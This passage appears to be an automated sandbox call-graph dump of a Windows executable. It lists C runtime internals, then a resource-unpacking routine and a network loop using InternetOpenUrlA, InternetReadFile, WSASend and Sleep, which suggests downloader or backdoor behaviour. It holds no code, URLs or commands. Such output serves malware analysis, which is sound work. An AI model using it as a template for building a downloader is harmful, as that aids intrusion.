18301 2e3b92c 18300->18301 18301->18299 18303 2e3b217 ___BuildCatchObject 18302->18303 18304 2e3882d __lock 59 API calls 18303->18304 18305 2e3b21e 18304->18305 18306 2e389ac __calloc_crt 59 API calls 18305->18306 18309 2e3b22f 18306->18309 18307 2e3b23a ___BuildCatchObject @_EH4_CallFilterFunc@8 18307->18256 18308 2e3b29a GetStartupInfoW 18314 2e3b2af 18308->18314 18318 2e3b3de 18308->18318 18309->18307 18309->18308 18310 2e3b4a6 18704 2e3b4b6 18310->18704 18312 2e389ac __calloc_crt 59 API calls 18312->18314 18313 2e3b42b GetStdHandle 18313->18318 18314->18312 18317 2e3b2fd 18314->18317 18314->18318 18315 2e3b43e GetFileType 18315->18318 18316 2e3b331 GetFileType 18316->18317 18317->18316 18317->18318 18319 2e3914c __mtinitlocks InitializeCriticalSectionAndSpinCount 18317->18319 18318->18310 18318->18313 18318->18315 18320 2e3914c __mtinitlocks InitializeCriticalSectionAndSpinCount 18318->18320 18319->18317 18320->18318 18322 2e3b524 GetModuleFileNameA 18321->18322 18323 2e3b51f 18321->18323 18325 2e3b551 18322->18325 18714 2e351ca 18323->18714 18708 2e3b5c4 18325->18708 18328 2e389f4 __malloc_crt 59 API calls 18329 2e3b58a 18328->18329 18330 2e3b5c4 _parse_cmdline 59 API calls 18329->18330 18331 2e33b43 18329->18331 18330->18331 18331->18261 18332 2e3b740 18331->18332 18333 2e3b749 18332->18333 18337 2e3b74e _strlen 18332->18337 18334 2e351ca ___initmbctable 71 API calls 18333->18334 18334->18337 18335 2e33b4c 18335->18261 18348 2e383aa 18335->18348 18336 2e389ac __calloc_crt 59 API calls 18338 2e3b784 _strlen 18336->18338 18337->18335 18337->18336 18338->18335 18340 2e389ac __calloc_crt 59 API calls 18338->18340 18341 2e3b7d6 18338->18341 18342 2e3b7fd 18338->18342 18345 2e3b814 18338->18345 18878 2e36bfc 18338->18878 18339 2e32eb4 _free 59 API calls 18339->18335 18340->18338 18341->18339 18343 2e32eb4 _free 59 API calls 18342->18343 18343->18335 18346 2e34e45 __invoke_watson 8 API calls 18345->18346 18347 2e3b820 18346->18347 18350 2e383b6 __IsNonwritableInCurrentImage 18348->18350 18887 2e3d21f 18350->18887 18355 2e35d54 18354->18355 18360 2e35d5a 18354->18360 18956 2e390ec 18355->18956 18357 2e38877 RtlDeleteCriticalSection 18359 2e32eb4 _free 59 API calls 18357->18359 18358 2e38893 18361 2e3889f RtlDeleteCriticalSection 18358->18361 18362 2e388b2 18358->18362 18359->18360 18360->18357 18360->18358 18361->18358 18362->18238 18367 2e3b4c6 18363->18367 18364 2e3b50e 18364->18264 18365 2e32eb4 _free 59 API calls 18365->18367 18366 2e3b4df RtlDeleteCriticalSection 18366->18367 18367->18364 18367->18365 18367->18366 18369 2e384e4 _doexit 59 API calls 18368->18369 18370 2e383a6 18369->18370 18370->18229 18372 2e3829e 18371->18372 18373 2e3828c 18371->18373 18374 2e32eb4 _free 59 API calls 18372->18374 18373->18372 18376 2e32eb4 _free 59 API calls 18373->18376 18375 2e382ab 18374->18375 18377 2e382cf 18375->18377 18379 2e32eb4 _free 59 API calls 18375->18379 18376->18373 18378 2e32eb4 _free 59 API calls 18377->18378 18380 2e382db 18378->18380 18379->18375 18381 2e32eb4 _free 59 API calls 18380->18381 18382 2e382ec 18381->18382 18383 2e32eb4 _free 59 API calls 18382->18383 18384 2e382f7 18383->18384 18385 2e3831c RtlEncodePointer 18384->18385 18388 2e32eb4 _free 59 API calls 18384->18388 18386 2e38331 18385->18386 18387 2e38337 18385->18387 18389 2e32eb4 _free 59 API calls 18386->18389 18391 2e32eb4 _free 59 API calls 18387->18391 18392 2e3834d 18387->18392 18390 2e3831b 18388->18390 18389->18387 18390->18385 18391->18392 18393 2e32eb4 _free 59 API calls 18392->18393 18394 2e33b98 18392->18394 18393->18394 18394->18240 18394->18241 18396 2e33bd4 18395->18396 18397 2e33bc6 18395->18397 18396->18238 18397->18396 18398 2e35d4a __mtterm 62 API calls 18397->18398 18398->18396 18400 2e39122 TlsGetValue 18399->18400 18401 2e3911e 18399->18401 18400->18234 18401->18234 18404 2e389b3 18402->18404 18405 2e33bf8 18404->18405 18406 2e389d1 18404->18406 18959 2e403f8 18404->18959 18405->18238 18408 2e3912a 18405->18408 18406->18404 18406->18405 18967 2e39445 Sleep 18406->18967 18409 2e39140 18408->18409 18410 2e39144 TlsSetValue 18408->18410 18409->18249 18410->18249 18412 2e35c2d ___BuildCatchObject 18411->18412 18413 2e3882d __lock 59 API calls 18412->18413 18414 2e35c6a 18413->18414 18968 2e35cc2 18414->18968 18417 2e3882d __lock 59 API calls 18418 2e35c8b ___addlocaleref 18417->18418 18971 2e35ccb 18418->18971 18420 2e35cb6 ___BuildCatchObject 18420->18257 18422 2e32ebd HeapFree 18421->18422 18426 2e32ee6 __dosmaperr 18421->18426 18423 2e32ed2 18422->18423 18422->18426 18424 2e35d9b __gmtime64_s 57 API calls 18423->18424 18425 2e32ed8 GetLastError 18424->18425 18425->18426 18426->18238 18428 2e35b71 18427->18428 18429 2e35b97 18427->18429 18430 2e35b7f 18428->18430 18431 2e3910b __threadstartex@4 TlsGetValue 18428->18431 18429->18238 18432 2e3912a __threadstartex@4 TlsSetValue 18430->18432 18431->18430 18433 2e35b8f 18432->18433 18976 2e35a2f 18433->18976 18436 2e38453 __init_pointers __initp_misc_winsig 18435->18436 18447 2e3394a RtlEncodePointer 18436->18447 18438 2e3846b __init_pointers 18439 2e391ba 34 API calls 18438->18439 18439->18270 18441 2e3896a 18440->18441 18443 2e35cde 18441->18443 18448 2e3914c 18441->18448 18443->18273 18444 2e390ce 18443->18444 18445 2e390e5 TlsAlloc 18444->18445 18446 2e35cf4 18444->18446 18446->18273 18446->18278 18447->18438 18449 2e39169 InitializeCriticalSectionAndSpinCount 18448->18449 18450 2e3915c 18448->18450 18449->18441 18450->18441 18453 2e38a02 18451->18453 18454 2e38a34 18453->18454 18456 2e32eec 18453->18456 18473 2e39445 Sleep 18453->18473 18454->18294 18454->18297 18457 2e32f67 18456->18457 18460 2e32ef8 18456->18460 18458 2e38143 _malloc RtlDecodePointer 18457->18458 18459 2e32f6d 18458->18459 18461 2e35d9b __gmtime64_s 58 API calls 18459->18461 18463 2e32f2b RtlAllocateHeap 18460->18463 18466 2e32f53 18460->18466 18467 2e32f03 18460->18467 18471 2e32f51 18460->18471 18521 2e38143 RtlDecodePointer 18460->18521 18464 2e32f5f 18461->18464 18463->18460 18463->18464 18464->18453 18523 2e35d9b 18466->18523 18467->18460 18474 2e38613 18467->18474 18483 2e38670 18467->18483 18518 2e3825c 18467->18518 18472 2e35d9b __gmtime64_s 58 API calls 18471->18472 18472->18464 18473->18453 18526 2e400be 18474->18526 18476 2e3861a 18478 2e400be __FF_MSGBANNER 59 API calls 18476->18478 18480 2e38627 18476->18480 18477 2e38670 __NMSG_WRITE 59 API calls 18479 2e3863f 18477->18479 18478->18480 18482 2e38670 __NMSG_WRITE 59 API calls 18479->18482 18480->18477 18481 2e38649 18480->18481 18481->18467 18482->18481 18484 2e3868e __NMSG_WRITE 18483->18484 18485 2e400be __FF_MSGBANNER 55 API calls 18484->18485 18517 2e387b5 18484->18517 18487 2e386a1 18485->18487 18489 2e387ba GetStdHandle 18487->18489 18490 2e400be __FF_MSGBANNER 55 API calls 18487->18490 18488 2e3881e 18488->18467 18493 2e387c8 _strlen 18489->18493 18489->18517 18491 2e386b2 18490->18491 18491->18489 18492 2e386c4 18491->18492 18492->18517 18542 2e3f47d 18492->18542 18495 2e38801 WriteFile 18493->18495 18493->18517 18495->18517 18497 2e38822 18601 2e34e45 IsProcessorFeaturePresent 18497->18601 18498 2e386f1 GetModuleFileNameW 18499 2e38711 18498->18499 18507 2e38721 __NMSG_WRITE 18498->18507 18501 2e3f47d __NMSG_WRITE 55 API calls 18499->18501 18501->18507 18507->18497 18511 2e38767 18507->18511 18551 2e3f4f2 18507->18551 18511->18497 18560 2e3f411 18511->18560 18594 2e3448b 18517->18594 18687 2e38228 GetModuleHandleExW 18518->18687 18522 2e38156 18521->18522 18522->18460 18690 2e35bb2 GetLastError 18523->18690 18525 2e35da0 18525->18471 18527 2e400c8 18526->18527 18528 2e400d2 18527->18528 18529 2e35d9b __gmtime64_s 59 API calls 18527->18529 18528->18476 18530 2e400ee 18529->18530 18533 2e34e35 18530->18533 18536 2e34e0a RtlDecodePointer 18533->18536 18537 2e34e1d 18536->18537 18538 2e34e45 __invoke_watson 8 API calls 18537->18538 18539 2e34e34 18538->18539 18540 2e34e0a __gmtime64_s 8 API calls 18539->18540 18541 2e34e41 18540->18541 18541->18476 18543 2e3f496 18542->18543 18544 2e3f488 18542->18544 18545 2e35d9b __gmtime64_s 59 API calls 18543->18545 18544->18543 18548 2e3f4af 18544->18548 18546 2e3f4a0 18545->18546 18547 2e34e35 __gmtime64_s 9 API calls 18546->18547 18549 2e386e4 18547->18549 18548->18549 18550 2e35d9b __gmtime64_s 59 API calls 18548->18550 18549->18497 18549->18498 18550->18546 18555 2e3f500 18551->18555 18552 2e3f504 18553 2e3f509 18552->18553 18554 2e35d9b __gmtime64_s 59 API calls 18552->18554 18553->18511 18556 2e3f534 18554->18556 18555->18552 18555->18553 18558 2e3f543 18555->18558 18558->18553 18559 2e35d9b __gmtime64_s 59 API calls 18558->18559 18559->18556 18561 2e3f413 18560->18561 18562 2e3f42b 18561->18562 18567 2e3f457 18561->18567 18563 2e35d9b __gmtime64_s 59 API calls 18562->18563 18566 2e38787 18566->18497 18567->18566 18568 2e35d9b __gmtime64_s 59 API calls 18567->18568 18595 2e34493 18594->18595 18596 2e34495 IsProcessorFeaturePresent 18594->18596 18595->18488 18598 2e394cf 18596->18598 18636 2e3947e IsDebuggerPresent 18598->18636 18602 2e34e50 18601->18602 18644 2e34cd8 18602->18644 18637 2e39493 ___raise_securityfailure 18636->18637 18642 2e39468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18637->18642 18639 2e3949b ___raise_securityfailure 18643 2e39453 GetCurrentProcess TerminateProcess 18639->18643 18641 2e394b8 18641->18488 18642->18639 18643->18641 18645 2e34cf2 _memset ___raise_securityfailure 18644->18645 18646 2e34d12 IsDebuggerPresent 18645->18646 18652 2e39468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18646->18652 18688 2e38241 GetProcAddress 18687->18688 18689 2e38253 ExitProcess 18687->18689 18688->18689 18691 2e3910b __threadstartex@4 TlsGetValue 18690->18691 18692 2e35bc7 18691->18692 18693 2e35c15 SetLastError 18692->18693 18694 2e389ac __calloc_crt 56 API calls 18692->18694 18693->18525 18695 2e35bda 18694->18695 18695->18693 18696 2e3912a __threadstartex@4 TlsSetValue 18695->18696 18697 2e35bee 18696->18697 18698 2e35bf4 18697->18698 18699 2e35c0c 18697->18699 18700 2e35c21 __initptd 56 API calls 18698->18700 18701 2e32eb4 _free 56 API calls 18699->18701 18703 2e35bfc GetCurrentThreadId 18700->18703 18702 2e35c12 18701->18702 18702->18693 18703->18693 18707 2e38997 RtlLeaveCriticalSection 18704->18707 18706 2e3b4bd 18706->18307 18707->18706 18710 2e3b5e6 18708->18710 18713 2e3b64a 18710->18713 18718 2e41516 18710->18718 18711 2e3b567 18711->18328 18711->18331 18712 2e41516 _parse_cmdline 59 API calls 18712->18713 18713->18711 18713->18712 18715 2e351d3 18714->18715 18716 2e351da 18714->18716 18774 2e35527 18715->18774 18716->18322 18721 2e414bc 18718->18721 18724 2e321bb 18721->18724 18725 2e321cc 18724->18725 18731 2e32219 18724->18731 18732 2e35b9a 18725->18732 18727 2e321d2 18728 2e321f9 18727->18728 18737 2e350ff 18727->18737 18728->18731 18752 2e35481 18728->18752 18731->18710 18733 2e35bb2 __getptd_noexit 59 API calls 18732->18733 18734 2e35ba0 18733->18734 18735 2e35bad 18734->18735 18736 2e3837f __amsg_exit 59 API calls 18734->18736 18735->18727 18736->18735 18738 2e3510b ___BuildCatchObject 18737->18738 18753 2e3548d ___BuildCatchObject 18752->18753 18775 2e35533 ___BuildCatchObject 18774->18775 18776 2e35b9a CallCatchBlock 59 API calls 18775->18776 18777 2e3553b 18776->18777 18778 2e35481 __setmbcp 59 API calls 18777->18778 18779 2e35545 18778->18779 18799 2e35222 18779->18799 18782 2e389f4 __malloc_crt 59 API calls 18784 2e35694 ___BuildCatchObject 18784->18716 18800 2e321bb _LocaleUpdate::_LocaleUpdate 59 API calls 18799->18800 18801 2e35232 18800->18801 18802 2e35253 18801->18802 18803 2e35241 GetOEMCP 18801->18803 18804 2e3526a 18802->18804 18805 2e35258 GetACP 18802->18805 18803->18804 18804->18782 18804->18784 18805->18804 18879 2e36c15 18878->18879 18880 2e36c07 18878->18880 18881 2e35d9b __gmtime64_s 59 API calls 18879->18881 18880->18879 18883 2e36c2b 18880->18883 18882 2e36c1c 18881->18882 18885 2e36c26 18883->18885 18886 2e35d9b __gmtime64_s 59 API calls 18883->18886 18885->18338 18886->18882 18888 2e3d222 RtlEncodePointer 18887->18888 18888->18888 18889 2e3d23c 18888->18889 18957 2e39103 TlsFree 18956->18957 18958 2e390ff 18956->18958 18957->18360 18958->18360 18960 2e40403 18959->18960 18963 2e4041e 18959->18963 18961 2e4040f 18960->18961 18960->18963 18962 2e35d9b __gmtime64_s 58 API calls 18961->18962 18965 2e40414 18962->18965 18964 2e4042e RtlAllocateHeap 18963->18964 18963->18965 18966 2e38143 _malloc RtlDecodePointer 18963->18966 18964->18963 18964->18965 18965->18404 18966->18963 18967->18406 18974 2e38997 RtlLeaveCriticalSection 18968->18974 18970 2e35c84 18970->18417 18975 2e38997 RtlLeaveCriticalSection 18971->18975 18973 2e35cd2 18973->18420 18974->18970 18975->18973 18979 2e35a3b ___BuildCatchObject 18976->18979 18977 2e35b43 ___BuildCatchObject 18977->18429 18978 2e35a54 18980 2e35a63 18978->18980 18982 2e32eb4 _free 59 API calls 18978->18982 18979->18977 18979->18978 18981 2e32eb4 _free 59 API calls 18979->18981 18983 2e35a72 18980->18983 18984 2e32eb4 _free 59 API calls 18980->18984 18981->18978 18982->18980 18985 2e35a81 18983->18985 18986 2e32eb4 _free 59 API calls 18983->18986 18984->18983 18987 2e35a90 18985->18987 18989 2e32eb4 _free 59 API calls 18985->18989 18986->18985 18988 2e35a9f 18987->18988 18990 2e32eb4 _free 59 API calls 18987->18990 18991 2e35aae 18988->18991 18992 2e32eb4 _free 59 API calls 18988->18992 18989->18987 18990->18988 18993 2e35ac0 18991->18993 18994 2e32eb4 _free 59 API calls 18991->18994 18992->18991 18995 2e3882d __lock 59 API calls 18993->18995 18994->18993 18998 2e35ac8 18995->18998 18996 2e35aeb 19008 2e35b4f 18996->19008 18998->18996 19000 2e32eb4 _free 59 API calls 18998->19000 19000->18996 19001 2e3882d __lock 59 API calls 19005 2e35aff ___removelocaleref 19001->19005 19004 2e32eb4 _free 59 API calls 19004->18977 19007 2e35b30 19005->19007 19011 2e34f05 19005->19011 19041 2e35b5b 19007->19041 19044 2e38997 RtlLeaveCriticalSection 19008->19044 19010 2e35af8 19010->19001 19012 2e34f7e 19011->19012 19013 2e34f1a 19011->19013 19014 2e34fcb 19012->19014 19015 2e32eb4 _free 59 API calls 19012->19015 19013->19012 19023 2e34f4b 19013->19023 19025 2e32eb4 _free 59 API calls 19013->19025 19016 2e34ff4 19014->19016 19085 2e3d47d 19014->19085 19017 2e34f9f 19015->19017 19021 2e35053 19016->19021 19036 2e32eb4 59 API calls _free 19016->19036 19019 2e32eb4 _free 59 API calls 19017->19019 19022 2e34fb2 19019->19022 19027 2e32eb4 _free 59 API calls 19021->19027 19028 2e32eb4 _free 59 API calls 19022->19028 19029 2e32eb4 _free 59 API calls 19023->19029 19040 2e34f69 19023->19040 19024 2e32eb4 _free 59 API calls 19030 2e34f73 19024->19030 19031 2e34f40 19025->19031 19026 2e32eb4 _free 59 API calls 19026->19016 19032 2e35059 19027->19032 19033 2e34fc0 19028->19033 19034 2e34f5e 19029->19034 19035 2e32eb4 _free 59 API calls 19030->19035 19045 2e3d31a 19031->19045 19032->19007 19038 2e32eb4 _free 59 API calls 19033->19038 19073 2e3d416 19034->19073 19035->19012 19036->19016 19038->19014 19040->19024 19261 2e38997 RtlLeaveCriticalSection 19041->19261 19043 2e35b3d 19043->19004 19044->19010 19046 2e3d329 19045->19046 19072 2e3d412 19045->19072 19047 2e3d33a 19046->19047 19048 2e32eb4 _free 59 API calls 19046->19048 19049 2e3d34c 19047->19049 19050 2e32eb4 _free 59 API calls 19047->19050 19048->19047 19051 2e3d35e 19049->19051 19052 2e32eb4 _free 59 API calls 19049->19052 19050->19049 19053 2e32eb4 _free 59 API calls 19051->19053 19057 2e3d370 19051->19057 19052->19051 19053->19057 19054 2e32eb4 _free 59 API calls 19056 2e3d382 19054->19056 19055 2e3d394 19059 2e3d3a6 19055->19059 19060 2e32eb4 _free 59 API calls 19055->19060 19056->19055 19058 2e32eb4 _free 59 API calls 19056->19058 19057->19054 19057->19056 19058->19055 19061 2e3d3b8 19059->19061 19063 2e32eb4 _free 59 API calls 19059->19063 19060->19059 19062 2e3d3ca 19061->19062 19064 2e32eb4 _free 59 API calls 19061->19064 19065 2e3d3dc 19062->19065 19066 2e32eb4 _free 59 API calls 19062->19066 19063->19061 19064->19062 19067 2e3d3ee 19065->19067 19068 2e32eb4 _free 59 API calls 19065->19068 19066->19065 19069 2e3d400 19067->19069 19070 2e32eb4 _free 59 API calls 19067->19070 19068->19067 19069->19072 19070->19069 19072->19023 19074 2e3d421 19073->19074 19084 2e3d479 19073->19084 19075 2e3d431 19074->19075 19076 2e32eb4 _free 59 API calls 19074->19076 19077 2e3d443 19075->19077 19078 2e32eb4 _free 59 API calls 19075->19078 19076->19075 19079 2e32eb4 _free 59 API calls 19077->19079 19080 2e3d455 19077->19080 19078->19077 19079->19080 19081 2e3d467 19080->19081 19082 2e32eb4 _free 59 API calls 19080->19082 19083 2e32eb4 _free 59 API calls 19081->19083 19081->19084 19082->19081 19083->19084 19084->19040 19086 2e3d48c 19085->19086 19260 2e34fe9 19085->19260 19087 2e32eb4 _free 59 API calls 19086->19087 19088 2e3d494 19087->19088 19089 2e32eb4 _free 59 API calls 19088->19089 19090 2e3d49c 19089->19090 19091 2e32eb4 _free 59 API calls 19090->19091 19092 2e3d4a4 19091->19092 19093 2e32eb4 _free 59 API calls 19092->19093 19094 2e3d4ac 19093->19094 19095 2e32eb4 _free 59 API calls 19094->19095 19096 2e3d4b4 19095->19096 19097 2e32eb4 _free 59 API calls 19096->19097 19098 2e3d4bc 19097->19098 19099 2e32eb4 _free 59 API calls 19098->19099 19260->19026 19261->19043 19262 402647 19265 401f64 FindResourceA 19262->19265 19264 40264c 19266 401f86 GetLastError SizeofResource 19265->19266 19267 401f9f 19265->19267 19266->19267 19268 401fa6 LoadResource LockResource GlobalAlloc 19266->19268 19267->19264 19269 401fd2 19268->19269 19270 401ffb GetTickCount 19269->19270 19272 402005 GlobalAlloc 19270->19272 19272->19267 19273 2e831af 19274 2e83b04 WriteFile 19273->19274 19276 2e272ab InternetOpenA 19277 2e272c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19276->19277 19299 2e266f4 _memset shared_ptr 19276->19299 19284 2e27342 _memset 19277->19284 19278 2e27322 InternetOpenUrlA 19279 2e27382 InternetCloseHandle 19278->19279 19278->19284 19279->19299 19280 2e2670e RtlEnterCriticalSection RtlLeaveCriticalSection 19280->19299 19281 2e26708 Sleep 19281->19280 19282 2e27346 InternetReadFile 19283 2e27377 InternetCloseHandle 19282->19283 19282->19284 19283->19279 19284->19278 19284->19282 19285 2e273e9 RtlEnterCriticalSection RtlLeaveCriticalSection 19387 2e3227c 19285->19387 19287 2e32eec _malloc 59 API calls 19288 2e2749d RtlEnterCriticalSection RtlLeaveCriticalSection 19287->19288 19288->19299 19289 2e2776a RtlEnterCriticalSection RtlLeaveCriticalSection 19289->19299 19291 2e3227c 66 API calls 19291->19299 19294 2e278e2 RtlEnterCriticalSection 19295 2e2790f RtlLeaveCriticalSection 19294->19295 19294->19299 19447 2e23c67 19295->19447 19297 2e32eec 59 API calls _malloc 19297->19299 19299->19276 19299->19280 19299->19281 19299->19285 19299->19287 19299->19289 19299->19291 19299->19294 19299->19295 19299->19297 19303 2e32eb4 59 API calls _free 19299->19303 19304 2e33529 60 API calls _strtok 19299->19304 19309 2e2a658 73 API calls 19299->19309 19315 2e276e7 shared_ptr 19299->19315 19316 2e276ec Sleep 19299->19316 19319 2e25119 19299->19319 19348 2e2ab42 19299->19348 19358 2e261f5 19299->19358 19361 2e2826e 19299->19361 19367 2e2d04a 19299->19367 19372 2e2831d 19299->19372 19380 2e233b2 19299->19380 19397 2e32790 19299->19397 19400 2e33a8f 19299->19400 19408 2e2966a 19299->19408 19415 2e2a782 19299->19415 19423 2e24100 19299->19423 19427 2e32358 19299->19427 19438 2e21ba7 19299->19438 19454 2e23d7e 19299->19454 19461 2e28f36 19299->19461 19468 2e2534d 19299->19468 19303->19299 19304->19299 19309->19299 19315->19316 19419 2e31830 19316->19419 19320 2e25123 __EH_prolog 19319->19320 19478 2e30a50 19320->19478 19323 2e23c67 72 API calls 19324 2e2514a 19323->19324 19325 2e23d7e 64 API calls 19324->19325 19326 2e25158 19325->19326 19327 2e2826e 89 API calls 19326->19327 19328 2e2516c 19327->19328 19330 2e25322 shared_ptr 19328->19330 19482 2e2a658 19328->19482 19330->19299 19332 2e251f6 19335 2e2a658 73 API calls 19332->19335 19333 2e251c4 19334 2e2a658 73 API calls 19333->19334 19336 2e251d4 19334->19336 19337 2e25207 19335->19337 19336->19330 19339 2e2a658 73 API calls 19336->19339 19337->19330 19338 2e2a658 73 API calls 19337->19338 19340 2e2524a 19338->19340 19341 2e252b4 19339->19341 19340->19330 19342 2e2a658 73 API calls 19340->19342 19341->19330 19343 2e2a658 73 API calls 19341->19343 19342->19336 19344 2e252da 19343->19344 19344->19330 19345 2e2a658 73 API calls 19344->19345 19346 2e25304 19345->19346 19487 2e2ce0c 19346->19487 19349 2e2ab4c __EH_prolog 19348->19349 19538 2e2d021 19349->19538 19351 2e2ab6d shared_ptr 19541 2e32030 19351->19541 19353 2e2ab84 19354 2e2ab9a 19353->19354 19547 2e23fb0 19353->19547 19354->19299 19359 2e32eec _malloc 59 API calls 19358->19359 19360 2e26208 19359->19360 19362 2e28286 19361->19362 19366 2e282a7 19361->19366 19993 2e29530 19362->19993 19365 2e282cc 19365->19299 19366->19365 19996 2e22ac7 19366->19996 19368 2e30a50 Mailbox 68 API calls 19367->19368 19369 2e2d060 19368->19369 19370 2e2d14e 19369->19370 19371 2e22db5 73 API calls 19369->19371 19370->19299 19371->19369 19373 2e28338 WSASetLastError shutdown 19372->19373 19374 2e28328 19372->19374 19376 2e2a43c 69 API calls 19373->19376 19375 2e30a50 Mailbox 68 API calls 19374->19375 19379 2e2832d 19375->19379 19377 2e28355 19376->19377 19378 2e30a50 Mailbox 68 API calls 19377->19378 19377->19379 19378->19379 19379->19299 19381 2e233e1 19380->19381 19382 2e233c4 InterlockedCompareExchange 19380->19382 19384 2e229ee 76 API calls 19381->19384 19382->19381 19383 2e233d6 19382->19383 20090 2e232ab 19383->20090 19386 2e233f1 19384->19386 19386->19299 19388 2e32288 19387->19388 19391 2e322ab 19387->19391 19390 2e3228e 19388->19390 19388->19391 19393 2e35d9b __gmtime64_s 59 API calls 19390->19393 20143 2e322c3 19391->20143 19392 2e322be 19392->19299 19394 2e32293 19393->19394 19395 2e34e35 __gmtime64_s 9 API calls 19394->19395 19396 2e3229e 19395->19396 19396->19299 20153 2e327ae 19397->20153 19399 2e327a9 19399->19299 19403 2e33a97 19400->19403 19401 2e32eec _malloc 59 API calls 19401->19403 19402 2e33ab1 19402->19299 19403->19401 19403->19402 19404 2e38143 _malloc RtlDecodePointer 19403->19404 19405 2e33ab5 std::exception::exception 19403->19405 19404->19403 19406 2e3449a __CxxThrowException@8 RaiseException 19405->19406 19407 2e33adf 19406->19407 19409 2e29674 __EH_prolog 19408->19409 19410 2e21ba7 210 API calls 19409->19410 19411 2e296c9 19410->19411 19412 2e296e6 RtlEnterCriticalSection 19411->19412 19413 2e29701 19412->19413 19414 2e29704 RtlLeaveCriticalSection 19412->19414 19413->19414 19414->19299 19416 2e2a78c __EH_prolog 19415->19416 20159 2e2df33 19416->20159 19418 2e2a7aa shared_ptr 19418->19299 19420 2e31861 19419->19420 19421 2e3183d 19419->19421 19420->19299 19421->19420 19422 2e31851 GetProcessHeap HeapFree 19421->19422 19422->19420 19424 2e24112 19423->19424 19426 2e24118 19423->19426 20163 2e2a636 19424->20163 19426->19299 19428 2e32374 19427->19428 19429 2e32389 19427->19429 19431 2e35d9b __gmtime64_s 59 API calls 19428->19431 19429->19428 19430 2e32390 19429->19430 20165 2e35f90 19430->20165 19432 2e32379 19431->19432 19434 2e34e35 __gmtime64_s 9 API calls 19432->19434 19436 2e32384 19434->19436 19436->19299 20390 2e45330 19438->20390 19440 2e21bb1 RtlEnterCriticalSection 19441 2e21bd1 19440->19441 19442 2e21be9 RtlLeaveCriticalSection 19440->19442 19441->19442 19444 2e21c55 RtlLeaveCriticalSection 19441->19444 20391 2e2e263 19442->20391 19444->19299 19445 2e21c22 19445->19444 19448 2e30a50 Mailbox 68 API calls 19447->19448 19449 2e23c7e 19448->19449 20473 2e23ca2 19449->20473 19455 2e23dcb htons 19454->19455 19456 2e23d99 htons 19454->19456 20506 2e23c16 19455->20506 20500 2e23bd3 19456->20500 19460 2e23ded 19460->19299 19462 2e28f40 __EH_prolog 19461->19462 20537 2e2373f 19462->20537 19464 2e28f5a RtlEnterCriticalSection 19465 2e28f69 RtlLeaveCriticalSection 19464->19465 19467 2e28fa3 19465->19467 19467->19299 19469 2e32eec _malloc 59 API calls 19468->19469 19470 2e25362 SHGetSpecialFolderPathA 19469->19470 19471 2e25378 19470->19471 19471->19471 20546 2e336b4 19471->20546 19474 2e253e2 19474->19299 19476 2e253dc 20562 2e339c7 19476->20562 19479 2e2513d 19478->19479 19480 2e30a79 19478->19480 19479->19323 19481 2e332e7 __cinit 68 API calls 19480->19481 19481->19479 19483 2e30a50 Mailbox 68 API calls 19482->19483 19484 2e2a672 19483->19484 19485 2e2519d 19484->19485 19492 2e22db5 19484->19492 19485->19330 19485->19332 19485->19333 19488 2e30a50 Mailbox 68 API calls 19487->19488 19490 2e2ce26 19488->19490 19489 2e2cf35 19489->19330 19490->19489 19519 2e22b95 19490->19519 19493 2e22de4 19492->19493 19494 2e22dca 19492->19494 19496 2e22dfc 19493->19496 19497 2e22def 19493->19497 19495 2e30a50 Mailbox 68 API calls 19494->19495 19505 2e22dcf 19495->19505 19506 2e22d39 WSASetLastError WSASend 19496->19506 19499 2e30a50 Mailbox 68 API calls 19497->19499 19499->19505 19500 2e30a50 68 API calls Mailbox 19503 2e22e0c 19500->19503 19501 2e22e54 WSASetLastError select 19516 2e2a43c 19501->19516 19503->19500 19503->19501 19504 2e22d39 71 API calls 19503->19504 19503->19505 19504->19503 19505->19484 19507 2e2a43c 69 API calls 19506->19507 19508 2e22d6e 19507->19508 19509 2e22d82 19508->19509 19510 2e22d75 19508->19510 19512 2e30a50 Mailbox 68 API calls 19509->19512 19514 2e22d7a 19509->19514 19511 2e30a50 Mailbox 68 API calls 19510->19511 19511->19514 19512->19514 19513 2e22d9c 19513->19503 19514->19513 19515 2e30a50 Mailbox 68 API calls 19514->19515 19515->19513 19517 2e30a50 Mailbox 68 API calls 19516->19517 19518 2e2a448 WSAGetLastError 19517->19518 19518->19503 19520 2e22bb1 19519->19520 19521 2e22bc7 19519->19521 19522 2e30a50 Mailbox 68 API calls 19520->19522 19523 2e22bd2 19521->19523 19528 2e22bdf 19521->19528 19527 2e22bb6 19522->19527 19525 2e30a50 Mailbox 68 API calls 19523->19525 19524 2e22be2 WSASetLastError WSARecv 19526 2e2a43c 69 API calls 19524->19526 19525->19527 19526->19528 19527->19490 19528->19524 19528->19527 19529 2e22d22 19528->19529 19531 2e22cbc WSASetLastError select 19528->19531 19532 2e30a50 68 API calls Mailbox 19528->19532 19534 2e21996 19529->19534 19533 2e2a43c 69 API calls 19531->19533 19532->19528 19533->19528 19535 2e2199f 19534->19535 19536 2e219bb 19534->19536 19537 2e332e7 __cinit 68 API calls 19535->19537 19536->19527 19537->19536 19560 2e2e1b3 19538->19560 19540 2e2d033 19540->19351 19645 2e332fc 19541->19645 19544 2e32054 19544->19353 19545 2e3207d ResumeThread 19545->19353 19546 2e32076 CloseHandle 19546->19545 19548 2e30a50 Mailbox 68 API calls 19547->19548 19549 2e23fb8 19548->19549 19964 2e21815 19549->19964 19552 2e2a5be 19553 2e2a5c8 __EH_prolog 19552->19553 19970 2e2cb76 19553->19970 19558 2e3449a __CxxThrowException@8 RaiseException 19559 2e2a5fc 19558->19559 19561 2e2e1bd __EH_prolog 19560->19561 19566 2e24030 19561->19566 19565 2e2e1eb 19565->19540 19578 2e45330 19566->19578 19568 2e2403a GetProcessHeap RtlAllocateHeap 19569 2e24053 std::exception::exception 19568->19569 19570 2e2407c 19568->19570 19579 2e2a5fd 19569->19579 19570->19565 19572 2e2408a 19570->19572 19573 2e24094 __EH_prolog 19572->19573 19626 2e2a21c 19573->19626 19578->19568 19580 2e2a607 __EH_prolog 19579->19580 19587 2e2cbac 19580->19587 19586 2e2a635 19596 2e2d70c 19587->19596 19590 2e2cbc6 19618 2e2d744 19590->19618 19592 2e2a624 19593 2e3449a 19592->19593 19595 2e344b9 RaiseException 19593->19595 19595->19586 19599 2e32453 19596->19599 19602 2e32481 19599->19602 19603 2e3248f 19602->19603 19607 2e2a616 19602->19607 19608 2e32517 19603->19608 19607->19590 19609 2e32520 19608->19609 19610 2e32494 19608->19610 19611 